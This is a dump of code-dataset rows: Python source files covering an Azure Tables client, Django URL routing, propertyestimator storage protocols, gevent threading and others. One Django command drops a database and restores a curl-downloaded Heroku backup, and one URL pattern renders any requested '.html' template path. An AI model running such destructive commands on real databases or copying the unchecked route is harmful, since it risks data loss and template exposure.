blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3fcda686d4f3fae22c7c376a354a4e591f5e6b78 | f4434c85e3814b6347f8f8099c081ed4af5678a5 | /sdk/tables/azure-data-tables/azure/data/tables/_table_client.py | 68ea82dc76b49f897a6edccb3aec84471859f7ef | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | yunhaoling/azure-sdk-for-python | 5da12a174a37672ac6ed8e3c1f863cb77010a506 | c4eb0ca1aadb76ad892114230473034830116362 | refs/heads/master | 2022-06-11T01:17:39.636461 | 2020-12-08T17:42:08 | 2020-12-08T17:42:08 | 177,675,796 | 1 | 0 | MIT | 2020-03-31T20:35:17 | 2019-03-25T22:43:40 | Python | UTF-8 | Python | false | false | 24,634 | py | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import functools
from typing import Optional, Any, Union # pylint: disable = W0611
try:
from urllib.parse import urlparse, unquote
except ImportError:
from urlparse import urlparse # type: ignore
from urllib2 import unquote # type: ignore
from azure.core.exceptions import HttpResponseError, ResourceNotFoundError
from azure.core.paging import ItemPaged
from azure.core.tracing.decorator import distributed_trace
from ._deserialize import _convert_to_entity, _trim_service_metadata
from ._entity import TableEntity
from ._error import _process_table_error
from ._generated import AzureTable
from ._generated.models import (
# AccessPolicy,
SignedIdentifier,
TableProperties,
)
from ._serialize import _get_match_headers, _add_entity_properties
from ._base_client import parse_connection_str
from ._table_client_base import TableClientBase
from ._serialize import serialize_iso
from ._deserialize import _return_headers_and_deserialized
from ._table_batch import TableBatchOperations
from ._models import TableEntityPropertiesPaged, UpdateMode, AccessPolicy
class TableClient(TableClientBase):
""" :ivar str account_name: Name of the storage account (Cosmos or Azure)"""
def __init__(
self, account_url, # type: str
table_name, # type: str
credential=None, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Create TableClient from a Credential.
:param account_url:
A url to an Azure Storage account.
:type account_url: str
:param table_name: The table name.
:type table_name: str
:param credential:
The credentials with which to authenticate. This is optional if the
account URL already has a SAS token, or the connection string already has shared
access key values. The value can be a SAS token string or an account shared access
key.
:type credential: str
:returns: None
"""
super(TableClient, self).__init__(account_url, table_name, credential=credential, **kwargs)
self._client = AzureTable(self.url, pipeline=self._pipeline)
@classmethod
def from_connection_string(
cls, conn_str, # type: str
table_name, # type: str
**kwargs # type: Any
):
# type: (...) -> TableClient
"""Create TableClient from a Connection String.
:param conn_str:
A connection string to an Azure Storage or Cosmos account.
:type conn_str: str
:param table_name: The table name.
:type table_name: str
:returns: A table client.
:rtype: ~azure.data.tables.TableClient
.. admonition:: Example:
.. literalinclude:: ../samples/sample_create_client.py
:start-after: [START create_table_client]
:end-before: [END create_table_client]
:language: python
:dedent: 8
:caption: Authenticating a TableServiceClient from a connection_string
"""
account_url, credential = parse_connection_str(
conn_str=conn_str, credential=None, service='table', keyword_args=kwargs)
return cls(account_url, table_name=table_name, credential=credential, **kwargs)
@classmethod
def from_table_url(cls, table_url, credential=None, **kwargs):
# type: (str, Optional[Any], Any) -> TableClient
"""A client to interact with a specific Table.
:param table_url: The full URI to the table, including SAS token if used.
:type table_url: str
:param credential:
The credentials with which to authenticate. This is optional if the
account URL already has a SAS token. The value can be a SAS token string, an account
shared access key.
:type credential: str
:returns: A table client.
:rtype: ~azure.data.tables.TableClient
"""
try:
if not table_url.lower().startswith('http'):
table_url = "https://" + table_url
except AttributeError:
raise ValueError("Table URL must be a string.")
parsed_url = urlparse(table_url.rstrip('/'))
if not parsed_url.netloc:
raise ValueError("Invalid URL: {}".format(table_url))
table_path = parsed_url.path.lstrip('/').split('/')
account_path = ""
if len(table_path) > 1:
account_path = "/" + "/".join(table_path[:-1])
account_url = "{}://{}{}?{}".format(
parsed_url.scheme,
parsed_url.netloc.rstrip('/'),
account_path,
parsed_url.query)
table_name = unquote(table_path[-1])
if not table_name:
raise ValueError("Invalid URL. Please provide a URL with a valid table name")
return cls(account_url, table_name=table_name, credential=credential, **kwargs)
@distributed_trace
def get_table_access_policy(
self,
**kwargs # type: Any
):
# type: (...) -> Dict[str,AccessPolicy]
"""Retrieves details about any stored access policies specified on the table that may be
used with Shared Access Signatures.
:return: Dictionary of SignedIdentifiers
:rtype: dict[str,AccessPolicy]
:raises ~azure.core.exceptions.HttpResponseError:
"""
timeout = kwargs.pop('timeout', None)
try:
_, identifiers = self._client.table.get_access_policy(
table=self.table_name,
timeout=timeout,
cls=kwargs.pop('cls', None) or _return_headers_and_deserialized,
**kwargs)
except HttpResponseError as error:
_process_table_error(error)
return {s.id: s.access_policy or AccessPolicy() for s in identifiers}
@distributed_trace
def set_table_access_policy(
self,
signed_identifiers, # type: Dict[str,AccessPolicy]
**kwargs):
# type: (...) -> None
"""Sets stored access policies for the table that may be used with Shared Access Signatures.
:param signed_identifiers:
:type signed_identifiers: dict[str,AccessPolicy]
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
self._validate_signed_identifiers(signed_identifiers)
identifiers = []
for key, value in signed_identifiers.items():
if value:
value.start = serialize_iso(value.start)
value.expiry = serialize_iso(value.expiry)
identifiers.append(SignedIdentifier(id=key, access_policy=value))
signed_identifiers = identifiers # type: ignore
try:
self._client.table.set_access_policy(
table=self.table_name,
table_acl=signed_identifiers or None,
**kwargs)
except HttpResponseError as error:
_process_table_error(error)
@distributed_trace
def create_table(
self,
**kwargs # type: Any
):
# type: (...) -> Dict[str,str]
"""Creates a new table under the current account.
:return: Dictionary of operation metadata returned from service
:rtype: dict[str,str]
:raises ~azure.core.exceptions.ResourceExistsError: If the table already exists
.. admonition:: Example:
.. literalinclude:: ../samples/sample_create_delete_table.py
:start-after: [START create_table_from_table_client]
:end-before: [END create_table_from_table_client]
:language: python
:dedent: 8
:caption: Creating a table from the TableClient object
"""
table_properties = TableProperties(table_name=self.table_name, **kwargs)
try:
metadata, _ = self._client.table.create(
table_properties,
cls=kwargs.pop('cls', _return_headers_and_deserialized))
return _trim_service_metadata(metadata)
except HttpResponseError as error:
_process_table_error(error)
@distributed_trace
def delete_table(
self,
**kwargs # type: Any
):
# type: (...) -> None
"""Deletes the table under the current account.
:return: None
:rtype: None
:raises ~azure.core.exceptions.ResourceNotFoundError: If the table does not exist
.. admonition:: Example:
.. literalinclude:: ../samples/sample_create_delete_table.py
:start-after: [START delete_table_from_table_client]
:end-before: [END delete_table_from_table_client]
:language: python
:dedent: 8
:caption: Deleting a table from the TableClient object
"""
try:
self._client.table.delete(table=self.table_name, **kwargs)
except HttpResponseError as error:
_process_table_error(error)
@distributed_trace
def delete_entity(
self,
partition_key, # type: str
row_key, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Deletes the specified entity in a table.
:param partition_key: The partition key of the entity.
:type partition_key: str
:param row_key: The row key of the entity.
:type row_key: str
:keyword str etag: Etag of the entity
:keyword ~azure.core.MatchConditions match_condition: MatchCondition
:return: None
:rtype: None
:raises ~azure.core.exceptions.ResourceNotFoundError: If the entity does not exist
.. admonition:: Example:
.. literalinclude:: ../samples/sample_insert_delete_entities.py
:start-after: [START delete_entity]
:end-before: [END delete_entity]
:language: python
:dedent: 8
:caption: Deleting an entity to a Table
"""
if_match, _ = _get_match_headers(kwargs=dict(kwargs, etag=kwargs.pop('etag', None),
match_condition=kwargs.pop('match_condition', None)),
etag_param='etag', match_param='match_condition')
try:
self._client.table.delete_entity(
table=self.table_name,
partition_key=partition_key,
row_key=row_key,
if_match=if_match or '*',
**kwargs)
except HttpResponseError as error:
_process_table_error(error)
@distributed_trace
def create_entity(
self,
entity, # type: Union[TableEntity, Dict[str,str]]
**kwargs # type: Any
):
# type: (...) -> Dict[str,str]
"""Insert entity in a table.
:param entity: The properties for the table entity.
:type entity: TableEntity or dict[str,str]
:return: Dictionary mapping operation metadata returned from the service
:rtype: dict[str,str]
:raises ~azure.core.exceptions.ResourceExistsError: If the entity already exists
.. admonition:: Example:
.. literalinclude:: ../samples/sample_insert_delete_entities.py
:start-after: [START create_entity]
:end-before: [END create_entity]
:language: python
:dedent: 8
:caption: Creating and adding an entity to a Table
"""
if "PartitionKey" in entity and "RowKey" in entity:
entity = _add_entity_properties(entity)
else:
raise ValueError('PartitionKey and RowKey were not provided in entity')
try:
metadata, _ = self._client.table.insert_entity(
table=self.table_name,
table_entity_properties=entity,
cls=kwargs.pop('cls', _return_headers_and_deserialized),
**kwargs)
return _trim_service_metadata(metadata)
except ResourceNotFoundError as error:
_process_table_error(error)
@distributed_trace
def update_entity(
self,
entity, # type: Union[TableEntity, Dict[str,str]]
mode=UpdateMode.MERGE, # type: UpdateMode
**kwargs # type: Any
):
# type: (...) -> Dict[str,str]
"""Update entity in a table.
:param entity: The properties for the table entity.
:type entity: TableEntity or dict[str,str]
:param mode: Merge or Replace entity
:type mode: ~azure.data.tables.UpdateMode
:keyword str partition_key: The partition key of the entity.
:keyword str row_key: The row key of the entity.
:keyword str etag: Etag of the entity
:keyword ~azure.core.MatchConditions match_condition: MatchCondition
:return: Dictionary mapping operation metadata returned from the service
:rtype: dict[str,str]
:raises ~azure.core.exceptions.HttpResponseError:
.. admonition:: Example:
.. literalinclude:: ../samples/sample_update_upsert_merge_entities.py
:start-after: [START update_entity]
:end-before: [END update_entity]
:language: python
:dedent: 8
:caption: Updating an already exiting entity in a Table
"""
if_match, _ = _get_match_headers(kwargs=dict(kwargs, etag=kwargs.pop('etag', None),
match_condition=kwargs.pop('match_condition', None)),
etag_param='etag', match_param='match_condition')
partition_key = entity['PartitionKey']
row_key = entity['RowKey']
entity = _add_entity_properties(entity)
try:
metadata = None
if mode is UpdateMode.REPLACE:
metadata, _ = self._client.table.update_entity(
table=self.table_name,
partition_key=partition_key,
row_key=row_key,
table_entity_properties=entity,
if_match=if_match or "*",
cls=kwargs.pop('cls', _return_headers_and_deserialized),
**kwargs)
elif mode is UpdateMode.MERGE:
metadata, _ = self._client.table.merge_entity(
table=self.table_name,
partition_key=partition_key,
row_key=row_key,
if_match=if_match or "*",
table_entity_properties=entity,
cls=kwargs.pop('cls', _return_headers_and_deserialized),
**kwargs)
else:
raise ValueError('Mode type is not supported')
return _trim_service_metadata(metadata)
except HttpResponseError as error:
_process_table_error(error)
@distributed_trace
def list_entities(
self,
**kwargs # type: Any
):
# type: (...) -> ItemPaged[TableEntity]
"""Lists entities in a table.
:keyword int results_per_page: Number of entities per page in return ItemPaged
:keyword select: Specify desired properties of an entity to return certain entities
:paramtype select: str or list[str]
:return: Query of table entities
:rtype: ~azure.core.paging.ItemPaged[~azure.data.tables.TableEntity]
:raises ~azure.core.exceptions.HttpResponseError:
.. admonition:: Example:
.. literalinclude:: ../samples/sample_update_upsert_merge_entities.py
:start-after: [START query_entities]
:end-before: [END query_entities]
:language: python
:dedent: 8
:caption: List all entities held within a table
"""
user_select = kwargs.pop('select', None)
if user_select and not isinstance(user_select, str):
user_select = ", ".join(user_select)
top = kwargs.pop('results_per_page', None)
command = functools.partial(self._client.table.query_entities, **kwargs)
return ItemPaged(
command,
table=self.table_name,
results_per_page=top,
select=user_select,
page_iterator_class=TableEntityPropertiesPaged
)
@distributed_trace
def query_entities(
self,
filter, # type: str # pylint: disable = W0622
**kwargs
):
# type: (...) -> ItemPaged[TableEntity]
"""Lists entities in a table.
:param str filter: Specify a filter to return certain entities
:keyword int results_per_page: Number of entities per page in return ItemPaged
:keyword select: Specify desired properties of an entity to return certain entities
:paramtype select: str or list[str]
:keyword dict parameters: Dictionary for formatting query with additional, user defined parameters
:return: Query of table entities
:rtype: ~azure.core.paging.ItemPaged[~azure.data.tables.TableEntity]
:raises ~azure.core.exceptions.HttpResponseError:
.. admonition:: Example:
.. literalinclude:: ../samples/sample_query_table.py
:start-after: [START query_entities]
:end-before: [END query_entities]
:language: python
:dedent: 8
:caption: Query entities held within a table
"""
parameters = kwargs.pop('parameters', None)
filter = self._parameter_filter_substitution(parameters, filter) # pylint: disable = W0622
top = kwargs.pop('results_per_page', None)
user_select = kwargs.pop('select', None)
if user_select and not isinstance(user_select, str):
user_select = ", ".join(user_select)
command = functools.partial(self._client.table.query_entities, **kwargs)
return ItemPaged(
command,
table=self.table_name,
results_per_page=top,
filter=filter,
select=user_select,
page_iterator_class=TableEntityPropertiesPaged
)
@distributed_trace
def get_entity(
self,
partition_key, # type: str
row_key, # type: str
**kwargs # type: Any
):
# type: (...) -> TableEntity
"""Get a single entity in a table.
:param partition_key: The partition key of the entity.
:type partition_key: str
:param row_key: The row key of the entity.
:type row_key: str
:return: Dictionary mapping operation metadata returned from the service
:rtype: ~azure.data.tables.TableEntity
:raises ~azure.core.exceptions.HttpResponseError:
.. admonition:: Example:
.. literalinclude:: ../samples/sample_update_upsert_merge_table.py
:start-after: [START get_entity]
:end-before: [END get_entity]
:language: python
:dedent: 8
:caption: Get a single entity from a table
"""
try:
entity = self._client.table.query_entities_with_partition_and_row_key(table=self.table_name,
partition_key=partition_key,
row_key=row_key,
**kwargs)
properties = _convert_to_entity(entity)
return properties
except HttpResponseError as error:
_process_table_error(error)
@distributed_trace
def upsert_entity( # pylint:disable=R1710
self,
entity, # type: Union[TableEntity, Dict[str,str]]
mode=UpdateMode.MERGE, # type: UpdateMode
**kwargs # type: Any
):
# type: (...) -> Dict[str,str]
"""Update/Merge or Insert entity into table.
:param entity: The properties for the table entity.
:type entity: TableEntity or dict[str,str]
:param mode: Merge or Replace and Insert on fail
:type mode: ~azure.data.tables.UpdateMode
:return: Dictionary mapping operation metadata returned from the service
:rtype: dict[str,str]
:raises ~azure.core.exceptions.HttpResponseError:
.. admonition:: Example:
.. literalinclude:: ../samples/sample_update_upsert_merge_entities.py
:start-after: [START upsert_entity]
:end-before: [END upsert_entity]
:language: python
:dedent: 8
:caption: Update/merge or insert an entity into a table
"""
partition_key = entity['PartitionKey']
row_key = entity['RowKey']
entity = _add_entity_properties(entity)
try:
metadata = None
if mode is UpdateMode.MERGE:
metadata, _ = self._client.table.merge_entity(
table=self.table_name,
partition_key=partition_key,
row_key=row_key,
table_entity_properties=entity,
cls=kwargs.pop('cls', _return_headers_and_deserialized),
**kwargs
)
elif mode is UpdateMode.REPLACE:
metadata, _ = self._client.table.update_entity(
table=self.table_name,
partition_key=partition_key,
row_key=row_key,
table_entity_properties=entity,
cls=kwargs.pop('cls', _return_headers_and_deserialized),
**kwargs)
else:
raise ValueError("""Update mode {} is not supported.
For a list of supported modes see the UpdateMode enum""".format(mode))
return _trim_service_metadata(metadata)
except HttpResponseError as error:
_process_table_error(error)
def create_batch(
self,
**kwargs # type: Dict[str, Any]
):
# type: (...) -> azure.data.tables.TableBatchOperations
"""Create a Batching object from a Table Client
:return: Object containing requests and responses
:rtype: ~azure.data.tables.TableBatchOperations
.. admonition:: Example:
.. literalinclude:: ../samples/sample_batching.py
:start-after: [START batching]
:end-before: [END batching]
:language: python
:dedent: 8
:caption: Using batches to send multiple requests at once
:raises None:
"""
return TableBatchOperations(
self._client,
self._client._serialize, # pylint:disable=protected-access
self._client._deserialize, # pylint:disable=protected-access
self._client._config, # pylint:disable=protected-access
self.table_name,
self,
**kwargs
)
def send_batch(
self, batch, # type: azure.data.tables.BatchTransactionResult
**kwargs # type: Any
):
# type: (...) -> BatchTransactionResult
"""Commit a TableBatchOperations to send requests to the server
:return: Object containing requests and responses
:rtype: ~azure.data.tables.BatchTransactionResult
:raises ~azure.data.tables.BatchErrorException:
.. admonition:: Example:
.. literalinclude:: ../samples/sample_batching.py
:start-after: [START batching]
:end-before: [END batching]
:language: python
:dedent: 8
:caption: Using batches to send multiple requests at once
"""
return self._batch_send(batch._entities, *batch._requests, **kwargs) # pylint:disable=protected-access
| [
"[email protected]"
] | |
a81597c63aba6f259d81ca952d201d0f7bc43c3a | 3601eb7ccde8ee96e7e65c9ab299e4053d088e70 | /licitte/urls.py | 8527111b88123d9ec86b8c2e28be52669516c814 | [] | no_license | ow7/licitte | ec73bd86d84da7311e2c8c261127f541584e1905 | e1bc5ce402425edbd38acd42b6fb07782bd08f9c | refs/heads/master | 2021-08-30T02:28:53.765789 | 2017-12-15T18:16:24 | 2017-12-15T18:16:24 | 114,397,715 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 927 | py | """licitte URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.shortcuts import render
urlpatterns = [
url(r'^(?P<template_name>.*\.html)', render),
url(r'^$', render, kwargs=dict(template_name='gentelella/index.html')),
url(r'^admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
aea2810a65c8473673713d7073b868aa0057c771 | 8c4ef53ec6c7df2eeeb633a53d1d931558596366 | /propertyestimator/protocols/storage.py | 5ed3b8a157424797084b7132befd9c807d2fdb0d | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | MSchauperl/propertyestimator | ff7bf2d3b6bc441141258483ec991f8806b09469 | 9a67cb61498024c511f9bbe55536ac8e1a3c93be | refs/heads/master | 2020-09-08T07:04:39.660322 | 2019-11-08T21:15:23 | 2019-11-08T21:15:23 | 221,055,340 | 0 | 0 | NOASSERTION | 2019-11-14T21:47:11 | 2019-11-11T19:34:28 | null | UTF-8 | Python | false | false | 7,869 | py | """
A collection of protocols for loading cached data off of the disk.
"""
import json
from os import path
from typing import Union
from propertyestimator.storage.dataclasses import StoredDataCollection
from propertyestimator.substances import Substance
from propertyestimator.thermodynamics import ThermodynamicState
from propertyestimator.utils.exceptions import PropertyEstimatorException
from propertyestimator.utils.serialization import TypedJSONDecoder, TypedJSONEncoder
from propertyestimator.workflow.decorators import protocol_input, protocol_output, UNDEFINED
from propertyestimator.workflow.plugins import register_calculation_protocol
from propertyestimator.workflow.protocols import BaseProtocol
@register_calculation_protocol()
class UnpackStoredDataCollection(BaseProtocol):
"""Loads a `StoredDataCollection` object from disk,
and makes its inner data objects easily accessible to other protocols.
"""
input_data_path = protocol_input(
docstring='A tuple which contains both the path to the simulation data object, '
'it\'s ancillary data directory, and the force field which was used '
'to generate the stored data.',
type_hint=Union[list, tuple],
default_value=UNDEFINED
)
collection_data_paths = protocol_output(
docstring='A dictionary of data object path, data directory path and '
'force field path tuples partitioned by the unique collection '
'keys.',
type_hint=dict
)
def execute(self, directory, available_resources):
if len(self.input_data_path) != 3:
return PropertyEstimatorException(directory=directory,
message='The input data path should be a tuple '
'of a path to the data object, directory, and a path '
'to the force field used to generate it.')
data_object_path = self.input_data_path[0]
data_directory = self.input_data_path[1]
force_field_path = self.input_data_path[2]
if not path.isfile(data_object_path):
return PropertyEstimatorException(directory=directory,
message='The path to the data object'
'is invalid: {}'.format(data_object_path))
if not path.isdir(data_directory):
return PropertyEstimatorException(directory=directory,
message='The path to the data directory'
'is invalid: {}'.format(data_directory))
if not path.isfile(force_field_path):
return PropertyEstimatorException(directory=directory,
message='The path to the force field'
'is invalid: {}'.format(force_field_path))
with open(data_object_path, 'r') as file:
data_object = json.load(file, cls=TypedJSONDecoder)
if not isinstance(data_object, StoredDataCollection):
return PropertyEstimatorException(directory=directory,
message=f'The data object must be a `StoredDataCollection` '
f'and not a {type(data_object)}')
self.collection_data_paths = {}
for data_key, inner_data_object in data_object.data.items():
inner_object_path = path.join(directory, f'{data_key}.json')
inner_directory_path = path.join(data_directory, data_key)
with open(inner_object_path, 'w') as file:
json.dump(inner_data_object, file, cls=TypedJSONEncoder)
self.collection_data_paths[data_key] = (inner_object_path,
inner_directory_path,
force_field_path)
return self._get_output_dictionary()
@register_calculation_protocol()
class UnpackStoredSimulationData(BaseProtocol):
"""Loads a `StoredSimulationData` object from disk,
and makes its attributes easily accessible to other protocols.
"""
simulation_data_path = protocol_input(
docstring='A list / tuple which contains both the path to the simulation data '
'object, it\'s ancillary data directory, and the force field which '
'was used to generate the stored data.',
type_hint=Union[list, tuple],
default_value=UNDEFINED
)
substance = protocol_output(
docstring='The substance which was stored.',
type_hint=Substance
)
total_number_of_molecules = protocol_output(
docstring='The total number of molecules in the stored system.',
type_hint=int
)
thermodynamic_state = protocol_output(
docstring='The thermodynamic state which was stored.',
type_hint=ThermodynamicState
)
statistical_inefficiency = protocol_output(
docstring='The statistical inefficiency of the stored data.',
type_hint=float
)
coordinate_file_path = protocol_output(
docstring='A path to the stored simulation output coordinates.',
type_hint=str
)
trajectory_file_path = protocol_output(
docstring='A path to the stored simulation trajectory.',
type_hint=str
)
statistics_file_path = protocol_output(
docstring='A path to the stored simulation statistics array.',
type_hint=str
)
force_field_path = protocol_output(
docstring='A path to the force field parameters used to generate the stored data.',
type_hint=str
)
def execute(self, directory, available_resources):
if len(self.simulation_data_path) != 3:
return PropertyEstimatorException(directory=directory,
message='The simulation data path should be a tuple '
'of a path to the data object, directory, and a path '
'to the force field used to generate it.')
data_object_path = self.simulation_data_path[0]
data_directory = self.simulation_data_path[1]
force_field_path = self.simulation_data_path[2]
if not path.isdir(data_directory):
return PropertyEstimatorException(directory=directory,
message='The path to the data directory'
'is invalid: {}'.format(data_directory))
if not path.isfile(force_field_path):
return PropertyEstimatorException(directory=directory,
message='The path to the force field'
'is invalid: {}'.format(force_field_path))
with open(data_object_path, 'r') as file:
data_object = json.load(file, cls=TypedJSONDecoder)
self.substance = data_object.substance
self.total_number_of_molecules = data_object.total_number_of_molecules
self.thermodynamic_state = data_object.thermodynamic_state
self.statistical_inefficiency = data_object.statistical_inefficiency
self.coordinate_file_path = path.join(data_directory, data_object.coordinate_file_name)
self.trajectory_file_path = path.join(data_directory, data_object.trajectory_file_name)
self.statistics_file_path = path.join(data_directory, data_object.statistics_file_name)
self.force_field_path = force_field_path
return self._get_output_dictionary()
| [
"[email protected]"
] | |
71a3bb66245a57da0b9a687f7218be571dc7bd17 | 66a9c25cf0c53e2c3029b423018b856103d709d4 | /sleekxmpp/plugins/xep_0080/__init__.py | cad23d221c641d7c8215c12347b0c7f54ddb50af | [
"MIT",
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | fritzy/SleekXMPP | 1b02d3e2b22efeb6bf3f8f487e6c0343b9b85baf | cc1d470397de768ffcc41d2ed5ac3118d19f09f5 | refs/heads/develop | 2020-05-22T04:14:58.568822 | 2020-02-18T22:54:57 | 2020-02-18T22:54:57 | 463,405 | 658 | 254 | NOASSERTION | 2023-06-27T20:05:54 | 2010-01-08T05:54:45 | Python | UTF-8 | Python | false | false | 388 | py | """
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2010 Nathanael C. Fritz, Erik Reuterborg Larsson
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
from sleekxmpp.plugins.base import register_plugin
from sleekxmpp.plugins.xep_0080.stanza import Geoloc
from sleekxmpp.plugins.xep_0080.geoloc import XEP_0080
register_plugin(XEP_0080)
| [
"[email protected]"
] | |
8d2ecc7056b9b55738c10426695a9662c51431d1 | d9f6f439300d298246c37ccfb881e8e8af4fda22 | /cfp/management/commands/pgimport.py | b2d47ebf1f43914e8cb93b5055a27b966d35cd71 | [
"MIT"
] | permissive | ajlozier/speakers | e62b8d346a58a034998860d1b42a38b00cbdbd23 | d7d87c99b1cfa5f9df5455f737385115d9d5279c | refs/heads/master | 2021-09-08T19:33:08.894305 | 2018-03-12T00:54:10 | 2018-03-12T00:54:10 | 122,101,157 | 0 | 0 | null | 2018-02-19T18:08:18 | 2018-02-19T18:08:18 | null | UTF-8 | Python | false | false | 936 | py | import os
import subprocess as sh
from cfp.management.base import SentryCommand
class Command(SentryCommand):
help = 'Import the production database locally'
def handle(self, *args, **options):
if not os.environ['ENVIRONMENT'] == 'DEVELOPMENT':
raise ValueError('This command can only be run in development')
try:
sh.check_call(['dropdb', 'speakers'])
sh.check_call(['createdb', 'speakers'])
sh.check_call(['heroku', 'pgbackups:capture'])
url = sh.check_output(['heroku', 'pgbackups:url'])
sh.check_call(['curl', '-o', 'latest.dump', url])
sh.call(['pg_restore', '--verbose', '--clean', '--no-acl',
'--no-owner', '-j', '2', '-h', 'localhost', '-d',
'speakers', 'latest.dump'])
finally:
if os.path.exists('latest.dump'):
os.unlink('latest.dump')
| [
"[email protected]"
] | |
cef8f53cd10fa1316157e73bf4527f28334914b2 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02621/s707981559.py | d48999af6cee0614504843656936330202f81205 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 76 | py | a = int(input().rstrip())
ans = lambda a: int(a + a**2 + a**3)
print(ans(a)) | [
"[email protected]"
] | |
96d0eb0199a49eab488eea08106fc599250023c4 | 271c7959a39f3d7ff63dddf285004fd5badee4d9 | /venv/Lib/site-packages/gevent/threading.py | 570ccd6c3e1c22ccffca38fbb0b971a6c35afd1a | [
"MIT"
] | permissive | natemellendorf/configpy | b6b01ea4db1f2b9109fd4ddb860e9977316ed964 | 750da5eaef33cede9f3ef532453d63e507f34a2c | refs/heads/master | 2022-12-11T05:22:54.289720 | 2019-07-22T05:26:09 | 2019-07-22T05:26:09 | 176,197,442 | 4 | 1 | MIT | 2022-12-08T02:48:51 | 2019-03-18T03:24:12 | Python | UTF-8 | Python | false | false | 8,634 | py | """
Implementation of the standard :mod:`threading` using greenlets.
.. note::
This module is a helper for :mod:`gevent.monkey` and is not
intended to be used directly. For spawning greenlets in your
applications, prefer higher level constructs like
:class:`gevent.Greenlet` class or :func:`gevent.spawn`. Attributes
in this module like ``__threading__`` are implementation artifacts subject
to change at any time.
.. versionchanged:: 1.2.3
Defer adjusting the stdlib's list of active threads until we are
monkey patched. Previously this was done at import time. We are
documented to only be used as a helper for monkey patching, so this should
functionally be the same, but some applications ignore the documentation and
directly import this module anyway.
A positive consequence is that ``import gevent.threading,
threading; threading.current_thread()`` will no longer return a DummyThread
before monkey-patching.
"""
from __future__ import absolute_import
__implements__ = [
'local',
'_start_new_thread',
'_allocate_lock',
'Lock',
'_get_ident',
'_sleep',
'_DummyThread',
]
import threading as __threading__
_DummyThread_ = __threading__._DummyThread
from gevent.local import local
from gevent.thread import start_new_thread as _start_new_thread, allocate_lock as _allocate_lock, get_ident as _get_ident
from gevent.hub import sleep as _sleep, getcurrent
# Exports, prevent unused import warnings
local = local
start_new_thread = _start_new_thread
allocate_lock = _allocate_lock
_get_ident = _get_ident
_sleep = _sleep
getcurrent = getcurrent
Lock = _allocate_lock
def _cleanup(g):
__threading__._active.pop(_get_ident(g), None)
def _make_cleanup_id(gid):
def _(_r):
__threading__._active.pop(gid, None)
return _
_weakref = None
class _DummyThread(_DummyThread_):
# We avoid calling the superclass constructor. This makes us about
# twice as fast (1.16 vs 0.68usec on PyPy, 29.3 vs 17.7usec on
# CPython 2.7), and has the important effect of avoiding
# allocation and then immediate deletion of _Thread__block, a
# lock. This is especially important on PyPy where locks go
# through the cpyext API and Cython, which is known to be slow and
# potentially buggy (e.g.,
# https://bitbucket.org/pypy/pypy/issues/2149/memory-leak-for-python-subclass-of-cpyext#comment-22347393)
# These objects are constructed quite frequently in some cases, so
# the optimization matters: for example, in gunicorn, which uses
# pywsgi.WSGIServer, every request is handled in a new greenlet,
# and every request uses a logging.Logger to write the access log,
# and every call to a log method captures the current thread (by
# default).
#
# (Obviously we have to duplicate the effects of the constructor,
# at least for external state purposes, which is potentially
# slightly fragile.)
# For the same reason, instances of this class will cleanup their own entry
# in ``threading._active``
# This class also solves a problem forking process with subprocess: after forking,
# Thread.__stop is called, which throws an exception when __block doesn't
# exist.
# Capture the static things as class vars to save on memory/
# construction time.
# In Py2, they're all private; in Py3, they become protected
_Thread__stopped = _is_stopped = _stopped = False
_Thread__initialized = _initialized = True
_Thread__daemonic = _daemonic = True
_Thread__args = _args = ()
_Thread__kwargs = _kwargs = None
_Thread__target = _target = None
_Thread_ident = _ident = None
_Thread__started = _started = __threading__.Event()
_Thread__started.set()
